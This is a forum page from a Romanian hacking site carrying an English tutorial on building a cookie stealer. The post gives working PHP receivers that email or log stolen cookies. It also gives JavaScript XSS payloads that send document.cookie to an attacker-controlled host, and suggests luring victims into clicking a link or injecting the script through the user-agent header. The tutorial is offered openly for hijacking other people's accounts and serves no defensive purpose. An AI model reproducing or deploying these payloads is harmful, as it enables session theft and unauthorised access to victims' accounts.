WWW.UNKNOWNS.RO
WWW.UNKNOWNS.RO
|
Lista Forumurilor Pe Tematici
|
WWW.UNKNOWNS.RO | Reguli | Inregistrare | Login
POZE WWW.UNKNOWNS.RO
Nu sunteti logat.
|
Nou pe simpatie:
Isabela_9my pe Simpatie.ro
 | Femeie
24 ani
Constanta
cauta Barbat
32 - 48 ani |
|
VIRUS
WWW.UNKNOWNS.RO
 Din: WWW.UNKNOWNS.RO
Inregistrat: acum 18 ani
Postari: 3176
|
|
hello,this is zizipo[whos running out of tutorials!!] i deciced to talk about cookie stealers which can be used to hack passwords,forums... so my first question 2 u is what is a cookie stealer? how does it work? so i can respond to that.. just like an email,the cookie has a receiver and sender!..
the sender must know social engineering or so.. and they can attach the cookie to something !..
and the receiver.. well the name says it all!
so the first thing you have to learn is the code.. n00bs.. find difficulties with making the code.the only 2 things needed to make a receiver are a webhost[needs to support pho],and notepad!... http get method is the best method to send information to a PhP document!, which appends information to the end of the URL as a parameter (for example, "page.php?arg1=value" . PHP can access GET information by accessing $HTTP_GET_VARS[x],x is the argument name .
the receiver must receive the cookie,so just use mails.. or logs. ill talk about both!.. .
ill start with emailing.this is a beast[functioning code]
Code:
<?php // line 1
$cookie = $HTTP_GET_VARS["cookie"]; // line 2
mail(" ", "Cookie stealer report", $cookie); // line 3
?> // line 4 |
Line 1 tells the server that this is indeed a PHP document.
Line 2 takes the cookie from the URL ("stealer.php?cookie=x" and stores it in the variable $cookie.
Line 3 accesses PHP's mail() function and sends the cookie to " " with the subject of "Cookie stealer report".
Line 4 tells the server that the PHP code ends here.
now the second way.. which is storing it inside a log.. . (functioning code)
Code:
<?php // line 1
$cookie = $HTTP_GET_VARS["cookie"]; // line 2
$file = fopen('cookielog.txt', 'a'); // line 3
fwrite($file, $cookie . "\n\n"); // line 4
?> // line 5 |
ines 1 and 2 are the same as before.
Line 3 opens the file "cookielog.txt" for writing, then stores the file's handle in $file.
Line 4 writes the cookie to the file which has its handle in $file. The period between $cookie and "\n\n" combines the two strings as one. The "\n\n" acts as a double line-break, making it easier for us to sift through the log file.
Line 5 is the same as before.
Step Two: Implementing the Stealer
using the sender is the hardest part in cookie stealing!. the easiest things,require html and java which isnt that easy!!. Here is an example of a sender.
Code:
HTML
<script language="JavaScript"> // Line 1
document.location="http://www.host.com/mysite/stealer.php?cookie=" + document.cookie; // Line 2
</script> // Line 3 |
Line 1 tells the browser that the following chunk of code is to be interpereted as JavaScript.
Line 2 adds document.cookie to the end of the URL, which is then stored in document.location. Whenever document.location is changed, the browser is redirected to that URL.
Line 3 tells the browser to stop reading the code as JavaScript (return to HTML).
here is how the sender will work
to do that.. you can trick the receiver like posting the cookie code on a website. and the receiver actually thinking it was an html!.. .
You can trick the victim into clicking a link which activates the sender. For example:
Code:
HTML
<a href="jdocument.location='http://www.host.com/mysite/stealer.php?cookie='+document.cookie;">Click here!</a> |
(remove the space in "javascript"
Another method I discovered is putting...
Code:
HTML
<script>document.location="http://www.host.com/mysite/stealer.php?cookie=" + document.cookie;</script> |
...into my user-agent.
Free PHP hosts:
_______________________________________
|
|
| pus acum 18 ani |
|